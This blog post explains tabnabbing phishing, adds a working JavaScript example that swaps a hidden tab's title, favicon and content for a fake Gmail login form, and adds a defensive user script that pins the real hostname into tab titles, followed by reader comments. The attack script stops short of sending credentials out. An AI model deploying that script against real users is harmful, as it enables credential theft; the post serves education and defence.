Watch out for forged Tabs - Tabnabbing Phishing Attack
For those of you who haven't heard about Tabnabbing, it's yet another form of phishing, one that is simpler and arguably more effective than the usual phishing attacks you will have heard of. What makes it dangerous is that it is hard to spot: even a modern browser and a cautious web surfer can be fooled, leading to credential theft.
What is Tabnabbing and how does it work?
Suppose you are working with multiple tabs. A friend tweets about a cool picture; you visit the site, look at the image and, without closing the tab, move on to another one. Meanwhile, a script on that page detects that the tab has lost focus and rewrites its content into a login page for your bank, Gmail, Yahoo or similar, swapping the favicon as well. When you return to the tab, the familiar favicon and content make you think it is your regular site, which has logged you out because the session expired, so you log in again and hand over your credentials.
This is Tabnabbing.
Note that the URL never changes; only the page content does, which is what catches you by surprise. So the usual advice, "always watch the URL", still works here, but by the time the user sees the familiar favicon and login form they are usually convinced already.
An example was shown by Aza Raskin, who discovered the attack: he uses JavaScript to turn a web page into a Gmail login page. Turning scripts off (with the NoScript add-on) blocks that version, but in a proof of concept by researcher Aviv Raff it turns out this can be done without scripts too. His forged page reloads every 20 seconds and turns into the phishing page (an image of the Gmail login) only once you have switched to another tab with the mouse; if you switch with the keyboard it takes 10 reloads.
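The script-based version described above (the page notices it has lost focus, waits, then rewrites its own title, favicon and body), as an added example that is not code from the original post or from Aza Raskin's demo. The dwell time, the fake form and the favicon path are assumptions made for illustration; the timing logic is kept as a pure state machine so it can be exercised outside a browser, and the DOM wiring sits beside it.

```javascript
// Added example, not code from the original post or from Aza Raskin's demo:
// a minimal tabnabbing page script. The timing logic is a pure state machine
// (TabnabTimer) so it can be exercised outside a browser; installTabnab wires
// it to the DOM. The dwell time, the fake form and the favicon path are
// assumptions made for illustration.

const HIDDEN_DWELL_MS = 5000; // assumed: only swap after the tab has been hidden this long

// What the page turns into once the user has looked away. A real attack copies
// the target site's markup; a bare form is enough to show the mechanism.
function forgedPage() {
  return {
    title: 'Gmail: Email from Google',   // mimics the target's tab title
    favicon: '/fake-gmail-favicon.ico',  // placeholder path (assumption)
    body: '<h1>Your session has expired. Please sign in again.</h1>' +
          '<form id="login"><input name="user" placeholder="Email">' +
          '<input name="pass" type="password" placeholder="Password">' +
          '<button>Sign in</button></form>',
  };
}

// Pure timing logic. Feed it hide(t)/show(t)/tick(t) with a monotonic clock in
// milliseconds; swapped becomes true once the page has been continuously hidden
// for dwellMs. Showing the tab earlier cancels the pending swap.
class TabnabTimer {
  constructor(dwellMs = HIDDEN_DWELL_MS) {
    this.dwellMs = dwellMs;
    this.hiddenSince = null;
    this.swapped = false;
  }
  hide(t) {
    if (!this.swapped && this.hiddenSince === null) this.hiddenSince = t;
  }
  // Returns true exactly once, on the call that triggers the swap.
  tick(t) {
    if (this.swapped || this.hiddenSince === null) return false;
    if (t - this.hiddenSince >= this.dwellMs) { this.swapped = true; return true; }
    return false;
  }
  // The user came back: swap now if the dwell time already elapsed, else reset.
  show(t) {
    const fired = this.tick(t);
    if (!this.swapped) this.hiddenSince = null;
    return fired;
  }
}

// DOM side, browser only. Note what is NOT touched: location.href. The address
// bar is the one thing this attack cannot forge.
function installTabnab(doc, timer = new TabnabTimer()) {
  const now = () => Date.now();
  let pending = null;

  const swap = () => {
    const page = forgedPage();
    doc.title = page.title;
    let link = doc.querySelector('link[rel~="icon"]');
    if (!link) {
      link = doc.createElement('link');
      link.rel = 'icon';
      doc.head.appendChild(link);
    }
    link.href = page.favicon;
    doc.body.innerHTML = page.body;
    doc.getElementById('login').addEventListener('submit', (e) => {
      e.preventDefault();
      // A real attacker would POST the form fields to their own server here.
      console.log('credentials would be exfiltrated at this point');
    });
  };

  doc.addEventListener('visibilitychange', () => {
    if (doc.hidden) {
      timer.hide(now());
      // Small slack so the callback never observes an elapsed time a few ms short.
      pending = setTimeout(() => { if (timer.tick(now())) swap(); }, timer.dwellMs + 100);
    } else {
      clearTimeout(pending);
      if (timer.show(now())) swap();
    }
  });
}

if (typeof document !== 'undefined') installTabnab(document);
```

Load it on any page, switch to another tab for longer than HIDDEN_DWELL_MS and switch back: title, favicon and body have been replaced while location.href is unchanged, which is exactly why checking the address bar still works against this attack.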
Fix for Tabnabbing
As Aza Raskin suggests, the Firefox Account Manager is a good way to defend users against such attacks. The attack has worked successfully on many major browsers, though the favicon swap did not work on Safari or Chrome. I also read a blog post about , and I don't know how it holds up, so I will still suggest that you check the URL before signing in, or use something like the Firefox Account Manager.
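A defensive user script in the spirit of the "always check the URL before signing in" advice above, as an added example that is not from the original post and is not the Firefox Account Manager. It pins the page's real hostname into the tab title so a forged title and favicon cannot hide where you are, and it flags a page that rewrites its title or favicon while the tab is hidden, which is the tabnabbing signature. The log format, the bracketed title prefix and the sample records are assumptions; the pure helpers are kept apart from the DOM wiring so they run outside a browser.

```javascript
// Added example, not from the original post: a defensive user script in the
// spirit of "always check the URL before signing in". It pins the page's real
// hostname into the tab title and flags title/favicon rewrites that happen
// while the tab is hidden (the tabnabbing signature). The log format and the
// "[hostname] " prefix are assumptions; pure helpers are separate from the DOM
// wiring so they run outside a browser.

// Prefix the real hostname to whatever title the page sets (idempotent).
function pinTitle(title, hostname) {
  const tag = '[' + hostname + '] ';
  return title.startsWith(tag) ? title : tag + title;
}

// Given a log of {t, type} records, where type is 'hidden', 'visible',
// 'title' or 'favicon', return the appearance changes made while hidden.
function changesWhileHidden(log) {
  let hidden = false;
  const flagged = [];
  for (const rec of log) {
    if (rec.type === 'hidden') hidden = true;
    else if (rec.type === 'visible') hidden = false;
    else if (hidden && (rec.type === 'title' || rec.type === 'favicon')) flagged.push(rec);
  }
  return flagged;
}

// Browser wiring: keep the title pinned and record <head> mutations.
function installGuard(doc, win) {
  const host = win.location.hostname;
  const tag = '[' + host + '] ';
  const log = [];
  let warned = 0;

  const repin = () => {
    const pinned = pinTitle(doc.title, host);
    if (doc.title !== pinned) doc.title = pinned;
  };

  doc.addEventListener('visibilitychange', () => {
    log.push({ t: Date.now(), type: doc.hidden ? 'hidden' : 'visible' });
  });

  // Title text lives in <title>; the favicon is a <link rel=icon> in <head>.
  // Observing <head> catches both an attacker's rewrite and our own re-pin;
  // the latter is already pinned when observed and so is not logged.
  new win.MutationObserver((records) => {
    for (const m of records) {
      const node = m.target.nodeType === 3 ? m.target.parentNode : m.target;
      const name = node && node.nodeName;
      if (name === 'TITLE' && !doc.title.startsWith(tag)) {
        log.push({ t: Date.now(), type: 'title' });
        repin();
      } else if (name === 'LINK') {
        log.push({ t: Date.now(), type: 'favicon' }); // href/rel changed on an existing link
      } else if (name === 'HEAD' && m.type === 'childList') {
        for (const n of m.addedNodes) {
          if (n.nodeName === 'LINK') log.push({ t: Date.now(), type: 'favicon' });
        }
      }
    }
    const bad = changesWhileHidden(log);
    if (bad.length > warned) {
      warned = bad.length;
      console.warn('page changed its ' + bad.map((r) => r.type).join('/') +
                   ' while hidden; check the URL: ' + win.location.href);
    }
  }).observe(doc.head, { subtree: true, childList: true, characterData: true, attributes: true });

  repin();
  return { log, flagged: () => changesWhileHidden(log) };
}

if (typeof document !== 'undefined') installGuard(document, window);
```

Run as a Greasemonkey-style script, every tab reads "[real-host] Page title", so a forged Gmail favicon next to "[evil.example] Gmail" is obvious, and a page that swaps its title or icon while you were away produces a console warning with the real URL.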
3 Comments
Then suppose you use Piro's tab-managing extension in delightful tree format in subdomain priority mode. Then suppose colorizing extensions begin to play well with other extensions -- assuming Mozilla ever bothers to design an extensions MANAGER.
Suppose you have the good sense to NOT use the interwebs with a user with admin rights.
Suppose further you are your own man in the middle to foil web fingerprinting.
Suppose you have one browser profile for using less untrusted sites and a different profile for as-yet-unseen, obviously untrusted sites, itself obviously locked down appropriately (tighter).
What a world it would be [sing along]
Why does a Google fanboi like the article author care about privacy? Shovel your digitized self into Google with as many shiny products as they give away for 'free'! Hurry.
Greasemonkey: show tab URL in title bar
d'oh
How well does tab spoofing work against extensions that manage site authentication?
hmm